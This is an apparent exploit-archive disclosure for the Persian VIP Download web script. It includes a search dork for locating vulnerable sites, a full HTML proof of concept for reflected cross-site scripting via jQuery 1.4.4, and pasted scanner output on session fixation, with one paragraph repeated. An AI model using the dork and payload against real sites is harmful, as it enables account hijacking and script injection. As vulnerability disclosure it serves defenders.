facebook facebook twitter rss

Persian VIP Download(ir) MUlti Vulnerability

Author: indoushka , Published: 25-10-2014
Persian VIP Download(ir) MUlti Vulnerability
============================================
Author : indoushka
Vondor : DEVIRAN.COM
Dork : تمامی حقوق متعلق به پرشین اسکریپت می باشد | پیاده سازی توسط ZegerSot
==========================

jQuery cross site scripting :

<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery 1.4.4 </title>
<script src="http://localhost/Persian/js/jquery-1.4.4.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>


<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script>alert(&#x27;xss
reflected - jquery 1.4.4 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>
</select>
</p>
</form>
</body>
</html>

Manual confirmation is required for this alert.

Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, it doesn't assign a new session ID, making it possible to use an existent session ID. The attack consists of inducing a user to authenticate himself with a known session ID, and then hijacking the user-validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.
Affected items
/Persian/img/img.php
The impact of this vulnerability
An attacker can fixate (set) victim's session identifier.

How to fix this vulnerability
Web applications must ignore any session ID provided by the user's browser at login and must always generate a new session to which the user will log in if successfully authenticated.

Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, it doesn't assign a new session ID, making it possible to use an existent session ID. The attack consists of inducing a user to authenticate himself with a known session ID, and then hijacking the user-validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.
This vulnerability affects /Persian/img/img.php.
Discovered by: Scripting (Session_Fixation.script).
Attack details
Session cookie PHPSESSID was fixed to indoufixation

Like us on Facebook :